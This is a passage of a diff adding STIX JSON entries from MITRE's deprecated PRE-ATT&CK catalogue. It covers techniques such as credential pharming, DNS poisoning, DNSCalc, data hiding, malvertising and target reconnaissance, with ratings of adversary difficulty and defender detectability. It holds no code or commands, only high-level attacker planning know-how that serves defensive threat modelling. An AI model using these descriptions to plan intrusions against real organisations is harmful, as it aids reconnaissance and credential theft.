}, + { + "source_name": "ChinaUN", + "description": "People's Republic of China. (2015, November). China's 13th Five-Year Plan. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1008", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--38a6d2f5-d948-4235-bb91-bb01604448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Credential pharming", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nCredential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim's computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1374", + "url": "https://attack.mitre.org/techniques/T1374" + }, + { + "description": "Ellen Messmer. (2008, January 22). First case of \"drive-by pharming\" identified in the wild. Retrieved March 2, 2017.", + "source_name": "DriveByPharming" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:16.035Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1151", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Although it can be difficult to spoof/redirect content to a hostile service via DNS poisoning or MiTM attacks, current malware such as Zeus is able to successfully pharm credentials and end users are not well-versed in checking for certificate mismatches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Fidelity of networking monitoring must be able to detect when traffic is diverted to non-normal sources at a site level. It is possible to identify some methods of pharming, but detection capabilities are limited and not commonly implemented.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--76c9e8cb-52e1-4ddc-80d4-5f7231842e06", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNS poisoning", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nDNS (cache) poisoning is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1382", + "url": "https://attack.mitre.org/techniques/T1382" + }, + { + "description": "Cindy Liu. (2016, March 30). Google DNS Poisoning Follows Brief Unblocking. Retrieved March 31, 2017.", + "source_name": "Google DNS Poisoning" + }, + { + "description": "John Leyden. (2014, January 21). DNS poisoning slams web traffic from millions in China into the wrong hole. Retrieved March 31, 2017.", + "source_name": "DNS Poisoning China" + }, + { + "description": "Paul Oliveria. (2008, January 11). Targeted Attack in Mexico: DNS Poisoning via Modems. Retrieved April 1, 2017.", + "source_name": "Mexico Modem DNS Poison" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:19:39.311Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1159", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Adversary poisons DNS entry to redirect traffic designated for one site to route to an adversary controlled resource.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Tracking multiple DNS infrastructures will likely require multiple tools/services, more advanced analytics, and mature detection/response capabilities in order to be effective. Few defenders demonstrate the mature processes to immediately detect and mitigate against the use of this technique.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7823039f-e2d5-4997-853c-ec983631206b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DNSCalc", + "description": "**This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).**\n\nDNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1324", + "url": "https://attack.mitre.org/techniques/T1324" + }, + { + "description": "Adam Meyers. (2013, March 29). Whois Numbered Panda. Retrieved March 6, 2017.", + "source_name": "CrowdstrikeNumberedPanda" + }, + { + "description": "Ned Moran, Mike Oppenheim. (2014, September 3). Darwin\u2019s Favorite APT Group. Retrieved March 6, 2017.", + "source_name": "FireEyeDarwinsAPTGroup" + }, + { + "source_name": "Rapid7G20Espionage", + "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", + "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:05:23.291Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1101", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique assists the adversary in bypassing egress filtering designed to prevent unauthorized communication. It has been used by APT12, but not otherwise widely reported. Some botnets are hardcoded to be able to use this technique.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "There are not currently available tools that provide the ability to conduct this calculation to detect this type of activity.", + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--1ff8b824-5287-4583-ab6a-013bf36d4864", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data Hiding", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).\n\nCertain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1320", + "external_id": "T1320" + }, + { + "source_name": "BotnetsDNSC2", + "description": "Christian J. Dietrich, Christian Rossow, Felix C. Freiling, Herbert Bos, Maarten van Steen, Norbert Pohlmann. (2011). On Botnets that use DNS for Command and Control. Retrieved March 6, 2017." + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + }, + { + "source_name": "DNS-Tunnel", + "description": "Alexey Shulmi and Sergey Yunakovsky. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "This technique requires a more advanced protocol understanding and testing to insert covert communication into legitimate protocol fields.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1097", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deploy exploit using advertising", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nExploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1380", + "url": "https://attack.mitre.org/techniques/T1380" + }, + { + "description": "Michael Mimoso. (2015, March 30). AD NETWORKS RIPE FOR ABUSE VIA MALVERTISING. Retrieved March 9, 2017.", + "source_name": "TPMalvertising" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:44.045Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1157", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can deploy exploits via malvertising using multiple mechanisms. Such mechanisms include an image ad that is infected, redirection, or using social engineering to get the end user to install the malicious software themselves.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Although some commercial technologies are being advertised which claim to detect malvertising, it largely spreads unknowingly because it doesn't always require an action by a user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--15d5eaa4-597a-47fd-a692-f2bed434d904", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Derive intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1230).\n\nLeadership or key decision makers may derive specific intelligence requirements from Key Intelligence Topics (KITs) or Key Intelligence Questions (KIQs). Specific intelligence requirements assist analysts in gathering information to establish a baseline of information about a topic or question and collection managers to clarify the types of information that should be collected to satisfy the requirement. (Citation: LowenthalCh4) (Citation: Heffter)", + "external_references": [ + { + "external_id": "T1230", + "url": "https://attack.mitre.org/techniques/T1230", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Clyde R. Heffter. (2011, August 4). A Fresh Look at Collection Requirements. Retrieved March 2, 2017.", + "source_name": "Heffter" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1007", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1284).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1284", + "external_id": "T1284" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + }, + { + "source_name": "Schneier-cloud", + "description": "Bruce Schneier. (2017, April 5). APT10 and Cloud Hopper. Retrieved May 9, 2017." + }, + { + "source_name": "Computerworld-suppliers", + "description": "Michael Kan. (2017, April 4). Chinese hackers go after third-party IT suppliers to steal data. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary searches publicly available sources and may find this information on the 3rd party web site listing new customers/clients.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Press releases may reveal this information particularly when it is an expected cost savings or improvement for scalability/reliability.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1061", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1260).\n\nInfrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1260", + "external_id": "T1260" + }, + { + "source_name": "FFIECAwareness", + "description": "Federal Financial Institutions Examination Council. (2016, October 17). Cybersecurity Awareness. Retrieved March 5, 2017." + }, + { + "source_name": "Zetter2015Threats", + "description": "Kim Zetter. (2015, January 4). The Biggest Security Threats We\u2019ll Face in 2015. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The data is passive in nature or not controlled by the defender, so it is hard to identify when an adversary is getting or analyzing the data.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Based on what the 3rd party infrastructure is, there are many tell tail signs which indicate it is hosted by a 3rd party, such as ASN data, MX or CNAME pointers or IP addresses", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1037", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d45fe3c2-0688-43b9-ac07-7eb86f575e93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine approach/attack vector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1245).\n\nThe approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1245", + "external_id": "T1245" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "WITCHCOVEN2015", + "description": "Jonathan Wrolstad and Barry Vengerik. (2015, November). Pinpointing Targets: Exploiting Web Analytics to Ensnare Victims. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1022", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a7dff5d5-99f9-4a7e-ac54-a64113c28121", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine centralization of IT management", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1285).\n\nDetermining if a \"corporate\" help desk exists, the degree of access and control it has, and whether there are \"edge\" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1285", + "external_id": "T1285" + }, + { + "source_name": "SANSCentratlizeManagement", + "description": "Scott Rasmussen. (2002, January 28). Centralized Network Security Management: Combining Defense In Depth with Manageable Security. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Requires an adversary to undergo a research process to learn the internal workings of an organization. An adversary can do this by social engineering individuals in the company by claiming to need to find information for the help desk, or through social engineering of former employees or business partners.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1062", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine domain and IP address space", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).\n\nDomain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1250", + "external_id": "T1250" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public or easily obtainable information by design.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "AS and IANA data are easily available, existing research tools.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1027", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a2fc93cd-e371-4755-9305-2615b6753d91", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine external network trust dependencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1259).\n\nNetwork trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)", + "external_references": [ + { + "external_id": "T1259", + "url": "https://attack.mitre.org/techniques/T1259", + "source_name": "mitre-pre-attack" + }, + { + "description": "Cliff Stoll. (1089). The Cuckoo's Egg. Retrieved August 8, 2017.", + "source_name": "CuckoosEgg" + }, + { + "description": "Wikipedia contributors. (2017, January 18). The Cuckoo's Egg. Retrieved March 5, 2017.", + "source_name": "CuckoosEggWikipedia" + }, + { + "description": "WBGH Nova. (1990, October 3). The KGB, the Computer and Me. Retrieved March 5, 2017.", + "source_name": "KGBComputerMe" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "technical-information-gathering", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1036", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Determining trust relationships once internal to a network is trivial. Simple tools like trace route can show evidence of firewalls or VPNs and then hosts on the either side of the firewall indicating a different trusted network. Active Directory command line tools can also identify separate trusted networks.\n\nIf completely external to a network, sniffing traffic (if possible) could also reveal the communications protocols that could be guessed to be a trusted network connection (e.g., IPsec, maybe SSL, etc.) though this is error-prone. \n\nWith no other access, this is hard for an adversary to do completely from a remote vantage point.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This is not easily performed remotely and therefore not a detectable event. If the adversary can sniff traffic to deduce trust relations, this is a passive activity and not detectable.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--6baf6388-d49f-4804-86a4-5837240555cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine firmware version", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).\n\nFirmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1258", + "external_id": "T1258" + }, + { + "source_name": "Abdelnur Advanced Fingerprinting", + "description": "Humberto J. Abdelnur, Radu State, Olivier Festor. (2008). Advanced Network Fingerprinting. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No easy way for defenders to detect when an adversary collects this information.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Depending upon the target device, there are variable ways for an adversary to determine the firmware version. In some cases, this information can be derived from easily obtained information. For example, in [http://www.cisco.com Cisco] devices, the firmware version is easily determined once the device model and OS version is known since it is included in the release notes.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1035", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine highest level tactical element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1243).\n\nFrom a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1243", + "external_id": "T1243" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + }, + { + "source_name": "JP3-60", + "description": "Joint Chiefs of Staff. (2013, January 31). Joint Targeting. Retrieved May 19, 2017." + }, + { + "source_name": "JP3-12R", + "description": "Joint Chiefs of Staff. (2013, February 5). Cyberspace Operations. Retrieved May 19, 2017." + }, + { + "source_name": "DoD Cyber 2015", + "description": "Department of Defense. (2015, April). The Department of Defense Cyber Strategy. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1020", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "target-selection" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c860af4a-376e-46d7-afbf-262c41012227", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine operational element", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1242).\n\nIf going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1242", + "external_id": "T1242" + }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and 